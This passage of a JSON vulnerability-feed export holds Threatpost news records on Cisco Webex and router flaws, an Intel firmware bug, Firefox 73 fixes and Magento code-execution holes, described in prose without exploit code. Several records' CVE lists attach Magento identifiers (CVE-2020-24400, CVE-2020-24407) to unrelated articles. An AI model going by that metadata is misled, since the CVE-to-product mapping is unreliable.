Microsoft can reduce reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. 
_**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:04", "description": "Cisco is warning of three high-severity flaws in its popular Webex web conferencing app, including one that could allow an unauthenticated attacker to remotely execute code on impacted systems.\n\nBeyond Webex, the networking giant on Wednesday also patched a slew of bugs across several products, including its small business RV routers and TelePresence Collaboration Endpoint software. It\u2019s also investigating whether vulnerabilities affect other products.\n\nThe most severe flaw (CVE-2020-3342) exists in the Webex Meetings Desktop App for Mac and ranks 8.8 out of 10 on the CVSS scale. The flaw stems from an improper validation of cryptographic protections, on files that are downloaded by the application as part of a software update, according to Cisco.\n\n\u201cAn attacker could exploit this vulnerability by persuading a user to go to a website that returns files to the client that are similar to files that are returned from a valid Webex website,\u201d according to [Cisco\u2019s security update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-mac-X7vp65BL>). \u201cThe client may fail to properly validate the cryptographic protections of the provided files before executing them as part of an update. 
A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the user.\u201d\n\nVersions of the Webex Meetings Desktop App for Mac earlier than Release 39.5.11 are affected; a fix is available in releases 39.5.11 and later. Windows versions of the app are not affected.\n\nA second flaw (CVE-2020-3361), which ranks 8.1 out of 10 on the CVSS scale, could allow an unauthenticated, remote attacker to gain unauthorized access to a vulnerable Webex site. The vulnerability stems from improper handling of authentication tokens by a vulnerable Webex site.\n\n\u201cAn attacker could exploit this vulnerability by sending crafted requests to a vulnerable Cisco Webex Meetings or Cisco Webex Meetings Server site,\u201d according to [Cisco\u2019s security update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-token-zPvEjKN>). \u201cIf successful, the attacker could gain the privileges of another user within the affected Webex site.\u201d\n\nCisco Webex Meetings sites (releases WBS 39.5.25 and earlier, WBS 40.4.10 and earlier, or release WBS 40.6.0) and Cisco Webex Meetings Server (releases 4.0MR3 and earlier) are affected. The flaw has been fixed in Cisco Webex Meetings Server Release 4.0 MR3 Security Patch 1; Cisco said customers on Cisco-hosted Webex Meetings sites do not need to take any actions to receive this update.\n\nThe [final Webex vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-url-fcmpdfVY>) exists in Cisco Webex Meetings Desktop App (releases earlier than Release 39.5.12), which could allow an unauthenticated, remote attacker to execute programs on an affected end-user system. 
This flaw (CVE-2020-3263), which ranks 7.5 out of 10 on the CVSS scale, is due to improper validation of input that is supplied to application URLs.\n\nA bad actor could exploit the glitch by persuading a user to follow a malicious URL. They could then cause an application to execute other programs that are already present on the end-user system. If malicious files are planted on the system or on an accessible network file path, the attacker could execute arbitrary code on the affected system, according to Cisco. Cisco Webex Meetings Desktop App releases earlier than Release 39.5.12 are affected; a fix is available in releases 40.1.0 and later.\n\nCisco also patched a medium-severity flaw (CVE-2020-3347) that could enable an authenticated, local attacker to gain access to sensitive information \u2013 including usernames, meeting information, or authentication tokens \u2013 on an affected system.\n\n\u201cIn an attack scenario, any malicious local user or malicious process running on a computer where WebEx Client for Windows is installed can monitor the memory mapped file for a login token,\u201d said Martin Rakhmanov with Trustwave\u2019s SpiderLabs research team, who discovered the flaw, in a [Thursday analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cisco-webex-memory-for-the-taking-cve-2020-3347/>). 
\u201cOnce found, the token, like any leaked credentials, can be transmitted somewhere so that it can be used to login to the WebEx account in question, download Recordings, view/edit Meetings, etc.\u201d\n\n## **Remote Working Impact**\n\nThe disclosed vulnerabilities come at a time when Webex and other online conferencing apps are surging in popularity, as the coronavirus drives [more employees to work remotely](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>).\n\n\u201cDue to the global pandemic of COVID-19, there\u2019s been an explosion of video conferencing and messaging software usage to help people transition their work-life to a work from home environment,\u201d said Rakhmanov. \u201cVulnerabilities in this type of software now present an even greater risk to its users.\u201d\n\nIn addition to Webex, Cisco also patched another type of collaboration tool: its Cisco TelePresence Collaboration Endpoint Software, used for conferencing meetings. According to Cisco, a high-severity flaw (CVE-2020-3336) in the software could allow a remote attacker to modify the filesystem to cause a denial of service (DoS) or gain privileged access to the root filesystem. The bad actor would need to be authenticated, however, which is in part why the bug only ranks 7.2 out of 10 on the CVSS scale.\n\n\u201cAn attacker with administrative privileges could exploit this vulnerability by sending requests with malformed parameters to the system using the console, Secure Shell (SSH), or web API,\u201d [according to Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tp-cmd-inj-7ZpWhvZb>). 
\u201cA successful exploit could allow the attacker to modify the device configuration or cause a DoS.\u201d\n\n## **Small Business Routers**\n\nCisco also patched several high-severity flaws in its [small business RV series routers](<https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html>), which offer virtual private networking technology for remote workers at small businesses.\n\nThese fixes address vulnerabilities tied to [11 CVEs in the web-based management interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-stack-vUxHmnNz>) of Cisco Small Business RV320, RV325, RV016, RV042, and RV082 routers, which if exploited could allow an authenticated, remote attacker with administrative privileges to execute arbitrary code on an affected device.\n\nAlso patched were [two flaws in the web-based management interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-injection-tWC7krKQ>) of Cisco RV110W, RV130, RV130W, and RV215W Series Routers, which if exploited could enable an authenticated attacker (with administrative privileges) to execute arbitrary commands remotely.\n\nFlaws tied to six CVEs [were also patched](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-Rj5JRfF8>) in the web-based management interface of Cisco Small Business RV320, RV325, RV016, RV042, and RV082 Routers. If exploited, these could allow an attacker to execute arbitrary commands with root privileges on the underlying operating system.\n\nCisco\u2019s Wednesday slew of security updates also addressed the [critical \u201cRipple20\u201d flaws](<https://threatpost.com/millions-connected-devices-ripple20-bugs/156599/>) that were disclosed on Monday. 
The 19 different vulnerabilities, four of them critical, affect hundreds of millions of internet of things (IoT) and industrial-control devices.\n\nCisco said it is currently investigating the Cisco ASR 5000 Series Router, Cisco Home Node-B Gateway, Cisco IP Services Gateway (IPSG) and Cisco PDSN/HA Packet Data Serving Node and Home Agent to see if they are affected by the flaws.\n\n\u201cCisco is investigating its product line to determine which products may be affected by these vulnerabilities,\u201d [according to the advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC>). \u201cAs the investigation progresses, Cisco will update this advisory with information about affected products.\u201d\n", "cvss3": {}, "published": "2020-06-18T16:18:12", "type": "threatpost", "title": "Cisco Webex, Router Bugs Allow Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3263", "CVE-2020-3336", "CVE-2020-3342", "CVE-2020-3347", "CVE-2020-3361"], "modified": "2020-06-18T16:18:12", "id": "THREATPOST:8207D062CD4838B19CB8398D9259D2CC", "href": "https://threatpost.com/cisco-webex-router-code-execution/156706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:15:27", "description": "Intel is warning of a rare critical-severity vulnerability affecting several of its motherboards, server systems and compute modules. The flaw could allow an unauthenticated, remote attacker to achieve escalated privileges.\n\nThe recently patched flaw ([CVE-2020-8708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8708>)) ranks 9.6 out of 10 on the CVSS scale, making it critical. Dmytro Oleksiuk, who discovered the flaw, told Threatpost that it exists in the firmware of Emulex Pilot 3. This baseboard-management controller is a service processor that monitors the physical state of a computer, network server or other hardware devices via specialized sensors.\n\nEmulex Pilot 3 is used by various motherboards, which aggregate all the server components into one system. 
Also impacted are various server operating systems, and some Intel compute modules, which are electronic circuits, packaged onto a circuit board, that provide various functions.\n\nThe critical flaw stems from improper-authentication mechanisms in these Intel products before version 1.59.\n\nIn bypassing authentication, an attacker would be able to access the KVM console of the server. The KVM console can access the system consoles of network devices to monitor and control their functionality. The KVM console is like a remote desktop implemented in the baseboard management controller \u2013 it provides an access point to the display, keyboard and mouse of the remote server, Oleksiuk told Threatpost.\n\nThe flaw is dangerous as it\u2019s remotely exploitable, and attackers don\u2019t need to be authenticated to exploit it \u2013 though they need to be located in the same network segment as the vulnerable server, Oleksiuk told Threatpost.\n\n\u201cThe exploit is quite simple and very reliable because it\u2019s a design flaw,\u201d Oleksiuk told Threatpost.\n\nBeyond this critical flaw, Intel also fixed bugs tied to 22 critical-, high-, medium- and low-severity CVEs affecting its server board, systems and compute modules. Other high-severity flaws include a heap-based overflow ([CVE-2020-8730](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8730>)) that\u2019s exploitable as an authenticated user; incorrect execution-assigned permissions in the file system ([CVE-2020-8731](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8731>)); and a buffer overflow in a daemon ([CVE-2020-8707](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8707>)) \u2014 all three of which enable escalated privileges.\n\nOleksiuk was credited with reporting CVE-2020-8708, as well as CVE-2020-8706 and CVE-2020-8707. 
All other CVEs were found internally by Intel.\n\nAffected server systems include the R1000WT and R2000WT families, R1000SP, LSVRP and LR1304SP families and R1000WF and R2000WF families.\n\nImpacted motherboards include the S2600WT family, S2600CW family, S2600KP family, S2600TP family, S1200SP family, S2600WF family, S2600ST family and S2600BP family.\n\nFinally, impacted compute modules include the HNS2600KP family, HNS2600TP family and HNS2600BP family. More information regarding patches is available in [Intel\u2019s security advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00384.html>).\n\nIntel also issued an [array of other security advisories](<https://www.intel.com/content/www/us/en/security-center/default.html>) addressing high-severity flaws across its product lines, including ones that affect [Intel Graphics Drivers](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00369.html>), Intel\u2019s [RAID web console](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00378.html>) 3 for Windows, [Intel Server Board M10JNP2SB](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00386.html>) and [Intel NUCs](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00392.html>).\n", "cvss3": {}, "published": "2020-08-11T20:02:22", "type": "threatpost", "title": "Critical Intel Flaw Afflicts Several Motherboards, Server Systems, Compute Modules", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-8706", "CVE-2020-8707", "CVE-2020-8708", "CVE-2020-8730", "CVE-2020-8731"], "modified": "2020-08-11T20:02:22", "id": "THREATPOST:8A8E859062970130E3F91D160F03325C", "href": "https://threatpost.com/critical-intel-flaw-motherboards-server-compute-modules/158270/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:26:16", "description": "Intel is warning of a high-severity vulnerability in its performance analysis tool called Intel VTune Profiler. If exploited, the flaw allows an adversary to escalate privileges, giving them elevated and unauthorized access to a targeted system.\n\nThe VTune Profiler, formerly known as the [VTune Amplifier](<https://software.intel.com/en-us/vtune-help>), is a software performance analysis application for serial and multithreaded application developers. 
While the application supports Windows, Linux, and Android platforms, Intel said that versions of the Intel VTune Profiler for Windows before update 8 are affected.\n\n\u201cImproper access control in driver for Intel VTune Amplifier for Windows before update 8 may allow an authenticated user to potentially enable escalation of privilege via local access,\u201d according to an [Intel security update](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00325.html>).\n\nThe vulnerability ([CVE-2019-14613](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14613>)), discovered internally by Intel, has a CVSS score of 8.2 out of 10, making it high severity. Intel urged users to update Intel VTune Profiler for Windows to update 8, [which was released Nov. 22, 2019](<https://software.intel.com/sites/default/files/managed/8d/1e/Intel_Vtune_Amplifier_2019u8_release_notes.pdf>).\n\nAs part of its regularly-scheduled updates, Intel also released patches addressing four \u201cmedium\u201d severity flaws and one \u201clow\u201d severity vulnerability.\n\n## Other Flaws\n\nOne of these is a medium-severity denial-of-service vulnerability ([CVE-2019-14615](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2019-14615>)) in Intel\u2019s graphics processors \u2013 including its Core, Xeon, Pentium, Celeron and Atom brands \u2013 that could enable information disclosure (a full list of [affected chipsets is here](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00314.html>)).\n\nThe vulnerability stems from \u201cinsufficient control flow in certain data structures\u201d of some processors, and could be exploited by an unauthenticated user with local access.\n\nAnother medium-severity vulnerability ([CVE-2019-14600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14600>)) exists in the installer of the [Intel SNMP Subagent Stand-Alone for 
Windows](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00300.html>), a tool that allows users to communicate using Simple Network Management Protocol (SNMP) with the Subagent on the managed server. The flaw, which stems from the uncontrolled search path element, may allow an escalation of privilege. Instead of issuing a fix, Intel said that it will discontinue the product and recommended that users \u201cuninstall it or discontinue use at their earliest convenience.\u201d\n\nIntel also patched a medium-severity flaw in the Intel [RAID Web Console](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00308.html>) (RWC) 3 for Windows, which enables users to configure the [Intel RAID Controllers](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00308.html>) (the card or chip located between the operating system and the storage drives) and disk drives installed on a system. The flaw ([CVE-2019-14601](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14601>)) stems from improper permissions in the installer of RWC and could potentially enable escalation of privilege via local access. 
Intel recommends updating RWC 3 for Windows to version 7.010.009.000 or later.\n\nOther flaws include an information disclosure flaw in the [Intel Chipset Device Software](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00306.html>) INF Utility ([CVE-2019-14596](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14596>)) and a low-severity flaw in the [Intel Data Analytics Acceleration Library](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00332.html>) that could enable information disclosure ([CVE-2019-14629](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14629>)).\n\nThe patches come a month after Intel disclosed [a new attack](<https://threatpost.com/intel-cpus-plundervolt-attack/151006/>) in December impacting modern Intel CPUs, which could allow an attacker to extract highly-sensitive information \u2013 such as encryption keys \u2013 from affected processors by altering their voltage. The attack, dubbed \u201cPlundervolt,\u201d centers around Intel Software Guard Extensions (SGX), a set of security-related instruction codes that are built into Intel CPUs. Intel SGX shields sensitive data \u2013 such as AES encryption keys \u2013 inside \u201cenclaves,\u201d which are physically separate from other CPU memory and are protected by software encryption.\n", "cvss3": {}, "published": "2020-01-14T21:00:28", "type": "threatpost", "title": "Intel Fixes High-Severity Flaw in Performance Analysis Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-14596", "CVE-2019-14600", "CVE-2019-14601", "CVE-2019-14613", "CVE-2019-14615", "CVE-2019-14629", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-14T21:00:28", "id": "THREATPOST:E8A45942B4C8BC03FF0C464DB57C713C", "href": "https://threatpost.com/intel-fixes-high-severity-flaw-in-performance-analysis-tool/151837/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:24:33", "description": "Mozilla has launched the latest version of its Firefox browser, which knocks out high-severity security flaws that leave systems open to attack by a remote adversary.\n\nThe patched versions of Mozilla\u2019s browser, [launched on Tuesday](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-05/>), are Firefox 73 and Firefox ESR 68.5. The Firefox ESR browser is its Extended Support Release version of Firefox, designed for mass deployments. Both releases tackle six vulnerabilities. Two of the high-severity bugs allow a remote attacker to execute code on targeted devices by enticing users to visit a specially-crafted web site and exploiting browser memory corruption flaws.\n\nThe Mozilla security bulletin said both high-severity flaws are tied to \u201cmemory safety bugs within the browser engine\u201d. One of the vulnerabilities, tracked as [CVE-2020-6800](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176072>), was fixed in a previous release of Firefox 72 and the current Firefox ESR 68.5 update on Tuesday. 
The other vulnerability ([CVE-2020-6801](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176077>)) was fixed with the release of Firefox 73 on Tuesday.\n\nMemory safety mechanisms protect systems from various software bugs tied to memory access, such as buffer overflows and other issues. According to the [IBM X-Force team\u2019s analysis](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176072>), a remote attacker could exploit either one of the vulnerabilities by persuading a victim to visit a specially-crafted webpage, and then use \u201cunknown attack vectors\u201d to execute arbitrary code on the vulnerable system or cause a denial of service (DoS).\n\n\u201cSome of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,\u201d Mozilla said.\n\nBoth memory safety bugs were reported by Mozilla developers and community members Raul Gurzau, Tyson Smith, Bob Clary, Liz Henry, and Christian Holler.\n\nAnother high-severity flaw ([CVE-2020-6796](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176073>)) was fixed in Firefox 73 and scores 8.8 out of 10 on the CVSS v3 scale. It stems from a missing bounds check (a method of detecting whether a variable is within some bounds before it is used) on the shared memory read process, within the parent process of the browser. A remote attacker could exploit this flaw by persuading a victim to visit a specially-crafted webpage, and using \u201cunknown attack vectors\u201d to then execute arbitrary code on the vulnerable system or cause a DoS.\n\n\u201cA content process could have modified shared memory relating to crash reporting information, crash itself, and cause an out-of-bound write,\u201d according to Mozilla\u2019s alert. 
\u201cThis could have caused memory corruption and a potentially exploitable crash.\u201d\n\nAnother flaw ([CVE-2020-6799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6799>)) addressed by Firefox 73 stems from an error when opening PDF links from other applications (when Firefox is configured as a default PDF reader). According to Mozilla, the flaw allows a remote attacker who persuades a victim to visit a specially-crafted site to execute arbitrary code on the system or trigger a DoS.\n\nWhile IBM X-Force said that this flaw has a CVSS 3.0 base score of 8.8 out of 10 (which would make it high-severity), Mozilla in its alert said that the impact was \u201cmoderate.\u201d\n\n\u201cCommand line arguments could have been injected during Firefox invocation as a shell handler for certain unsupported file types,\u201d Mozilla said in its release. \u201cThis required Firefox to be configured as the default handler for a given file type and for a file downloaded to be opened in a third party application that insufficiently sanitized URL data. In that situation, clicking a link in the third party application could have been used to retrieve and execute files whose location was supplied through command line arguments.\u201d\n\nOther moderate-severity flaws include a bug stemming from incorrect parsing of the template tag that could allow JavaScript injection (CVE-2020-6798) and a glitch where extensions could launch an arbitrary app on victims\u2019 computers (CVE-2020-6797).\n\nUsers can download the [latest Firefox version here](<https://www.mozilla.org/firefox/download/thanks/>). Beyond security fixes, Mozilla also noted that users with 0patch security software may encounter crashes at startup after updating to Firefox 73. The issue will be fixed in a future Firefox release, according to Mozilla. 
\u201cAs a workaround, an exclusion for firefox.exe can be added within the 0patch settings,\u201d it said.\n\nThunderbird 68.5.0 has also been released, marking its first release under the ownership of [new company MZLA Technologies Corporation](<https://www.phoronix.com/scan.php?page=news_item&px=Thunderbird-MZLA-Technologies>), which is a wholly owned subsidiary of Mozilla Foundation. As part of this release, [six moderate- and low-severity flaws](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-07/>) were fixed (along with CVE-2020-6800).\n\nThe February update is less severe than Mozilla\u2019s January Firefox 72 browser release, where it [patched a critical vulnerability](<https://threatpost.com/mozilla-releases-firefox-72/151636/>) actively being exploited in the wild.\n", "cvss3": {}, "published": "2020-02-12T19:14:59", "type": "threatpost", "title": "Mozilla Firefox 73 Browser Update Fixes High-Severity RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-6796", "CVE-2020-6797", "CVE-2020-6798", "CVE-2020-6799", "CVE-2020-6800", "CVE-2020-6801"], "modified": "2020-02-12T19:14:59", "id": "THREATPOST:AF48B7955116E7E79CD8F432216C960A", "href": "https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T21:03:04", "description": "Two critical flaws in Magento \u2013 Adobe\u2019s e-commerce platform that is commonly targeted by attackers like the [Magecart threat group](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could enable arbitrary code execution on affected systems.\n\nRetail is set to boom in the coming months \u2013 between [this week\u2019s Amazon Prime Day](<https://threatpost.com/amazon-prime-day-spurs-spike-in-phishing-fraud-attacks/159960/>) and [November\u2019s Black Friday](<https://threatpost.com/black-friday-shoppers-scams-fake-domains/150593/>) \u2013 which puts pressure on Adobe to rapidly patch up any holes in the popular Magento open-source platform, which powers many online shops.\n\nThe company on Thursday disclosed two critical flaws, six important-rated errors and one moderate-severity vulnerability plaguing both Magento Commerce (which is aimed at enterprises that need premium support levels, and has a license fee starting at $24,000 annually) and Magento Open Source (its free alternative).\n\nThe most severe of these is a vulnerability that allows arbitrary code execution. 
The issue stems from the application not validating full filenames when using an \u201callow list\u201d method to check the file extensions. This could enable an attacker to bypass the validation and upload a malicious file. In order to exploit this flaw (CVE-2020-24407), attackers would not need pre-authentication (meaning the flaw is exploitable without credentials) \u2013 however, they would need administrative privileges.\n\nThe other critical flaw is an SQL injection vulnerability. This is a type of web security flaw that allows an attacker to interfere with the queries that an application makes to its database. An attacker without authentication \u2013 but also with administrative privileges \u2013 could exploit this bug in order to gain arbitrary read or write access to a database.\n\nAdobe also issued patches for various important improper-authorization vulnerabilities, which occur when an application does not properly check that a user is authorized to access functionality \u2014 which could ultimately expose data. These include a flaw that could allow unauthorized modification of Magento content management system (CMS) pages (CVE-2020-24404), one that could enable the unauthorized modification of an e-commerce business customer list (CVE-2020-24402) and two that could allow for unauthorized access to restricted resources (CVE-2020-24405 and CVE-2020-24403).\n\nAnother important vulnerability stems from an insufficient validation of a User Session, which could give an attacker unauthorized access to restricted resources (CVE-2020-24401).\n\nFor all of the flaws above, an attacker would need to have administrative privileges, but wouldn\u2019t need pre-authentication to exploit the flaw, according to Adobe.\n\nFinally, an important-severity cross-site scripting flaw (CVE-2020-24408) was also addressed, which could allow for arbitrary JavaScript execution in the browser. 
To exploit this, an attacker wouldn\u2019t need administrative privileges, but they would need credentials.\n\nSpecifically affected are Magento Commerce, versions 2.3.5-p1 and earlier and 2.4.0 and earlier; as well as Magento Open Source, versions 2.3.5-p1 and earlier and 2.4.0 and earlier. Adobe has issued patches in Magento Commerce and Magento Open Source versions 2.4.1 and 2.3.6, and \u201crecommends users update their installation to the newest version.\u201d\n\nThe update for all vulnerabilities is a priority 2, meaning they exist in a product that has historically been at elevated risk \u2013 but for which there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d according to the firm.\n\nIndeed, Magento has had its share of security flaws over the past year. In July, [Adobe fixed two critical vulnerabilities and two important-severity flaws](<https://threatpost.com/critical-magento-flaws-code-execution/157840/>) that could have enabled code execution and a signature-verification bypass. And in April, Adobe [patched several critical flaws](<https://helpx.adobe.com/security/products/magento/apsb20-22.html>) in Magento, which if exploited could lead to arbitrary code execution or information disclosure.\n\nThe issue also comes after [Magento 1 reached end-of-life (EOL) in June](<https://threatpost.com/tuesdays-magento-1-eol-100k-online-stores/157000/>), with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2. 
E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n", "cvss3": {}, "published": "2020-10-15T20:59:30", "type": "threatpost", "title": "Critical Magento Holes Open Online Shops to Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24401", "CVE-2020-24402", "CVE-2020-24403", "CVE-2020-24404", "CVE-2020-24405", "CVE-2020-24407", "CVE-2020-24408"], "modified": "2020-10-15T20:59:30", "id": "THREATPOST:785BBBEDA09A3CE4F8ACBCFA48B51AD2", "href": "https://threatpost.com/critical-magento-holes-online-shops-code-execution/160181/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:25", "description": "Critical vulnerabilities in Adobe\u2019s Magento e-commerce platform \u2013 a favorite target of the [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could lead to arbitrary code execution.\n\nAdobe issued patches on Tuesday as part of its overall release of the [Magento 2.3.4 upgrade](<https://magento.com/blog/magento-news/magento-2.3.4-building-more-engaging-customer-experiences>), giving the fixes a \u201cpriority 2\u201d rating. 
In [Adobe parlance](<https://helpx.adobe.com/security/severity-ratings.html>), priority 2 means that administrators should apply the updates within 30 days.\n\nOut of the flaws, Adobe [has fixed](<https://helpx.adobe.com/security/products/magento/apsb20-02.html>) three that it rates as critical in severity, meaning that successful exploits could \u201callow malicious native code to execute, potentially without a user being aware.\u201d\n\nTwo of these could allow arbitrary code execution: CVE-2020-3716 is a deserialization of untrusted data flaw; and CVE-2020-3718 is a security bypass issue.\n\nThe bug tracked as CVE-2020-3719, meanwhile, would allow SQL injection if successfully exploited. [SQL injection attacks](<https://owasp.org/www-project-cheat-sheets/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html>) occur when a website developer doesn\u2019t sanitize user-supplied data, which can lead to arbitrary reading and writing of data used within a web application. An attacker can take advantage, for example, by sending a malicious search query in the search box of a website.\n\nAdobe also patched a handful of bugs that it rates \u201cimportant\u201d in severity \u2013 [defined as](<https://helpx.adobe.com/security/severity-ratings.html>) issues that could allow \u201caccess to confidential data, or could compromise processing resources in a user\u2019s computer.\u201d\n\nThese include CVE-2020-3715 and CVE-2020-3758, stored cross-site scripting (XSS) flaws that could allow sensitive information disclosure. XSS bugs are [a type of injection](<https://owasp.org/www-community/attacks/xss/>), in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. 
If the browser doesn\u2019t validate the script and executes it, the script can access cookies, session tokens or other sensitive information retained by the browser.\n\nMeanwhile, the flaw tracked as CVE-2020-3717 is a path-traversal vulnerability that also could lead to sensitive information disclosure.\n\n## The Magecart Connection\n\nThe updates are likely of interest to Magecart groups, who will look to exploit the flaws ahead of administrators applying the patches. Magecart is an umbrella term encompassing several different threat groups who typically use the same modus operandi. They compromise websites by exploiting vulnerabilities in third-party e-commerce platforms, in order to inject card-skimming scripts on checkout pages. Magento is one of Magecart\u2019s most-targeted platforms.\n\nSQL injection bugs for instance have been successfully used by Magecart groups in their efforts before. An attack last year against Magento 2 (mounted within 16 hours of the flaw being disclosed) [exploited an SQL injection bug](<https://sansec.io/labs/2019/05/10/magento-2-hacks/>) to steal administrative console credentials by dumping the contents of the admin_user database table. These credentials were then used to log into the Magento dashboard and add the Magecart malware to the targeted website.\n\nCross-Site Scripting (XSS) flaws are another common attack vector against websites. Magecart [used a form of XSS](<https://www.thesslstore.com/blog/magecart-newegg-breach/>) attacks during [the Newegg breach](<https://threatpost.com/magecart-strikes-again-siphoning-payment-info-from-newegg/137576/>), for example.\n\n\u201cMagecart is a simple bit of code that is sophisticatedly injected into websites to steal credit-card information and most of the time unknowing to the website organization,\u201d said James McQuiggan, security awareness advocate at KnowBe4, via email. 
\u201cIt is important for organizations that use e-commerce websites with third-party connections or plugins to verify that they are up to date with all known patches and software. Organizations will want to restrict third-party vendors\u2019 access to sensitive data, like credit-card data, names and home address. Having a robust third-party policy to restrict external access to sensitive information and only allowing verified code or scripts to be executed can greatly reduce exposure.\u201d\n\nThe versions impacted by the latest slew of bugs are Magento Commerce and Open Source, 2.2.10 and earlier versions and 2.3.3 and earlier versions; Magento Enterprise Edition 1.14.4.3 and earlier versions; and Magento Community Edition, 1.9.4.3 and earlier versions. Users should update to version 2.3.4 to address the problems.\n\nAdobe gave white-hats Ernesto Martin, Blaklis, Luke Rodgers and Djordje Marjanovic credit for the various bugs\u2019 discovery.\n", "cvss3": {}, "published": "2020-01-29T15:27:13", "type": "threatpost", "title": "Critical Flaws in Magento e-Commerce Platform Allow Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3715", "CVE-2020-3716", "CVE-2020-3717", "CVE-2020-3718", "CVE-2020-3719", "CVE-2020-3758"], "modified": "2020-01-29T15:27:13", "id": "THREATPOST:F601825CA049E15E130F5026708E5DC5", "href": "https://threatpost.com/critical-flaws-magento-ecommerce-code-execution/152343/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-17T22:14:25", "description": 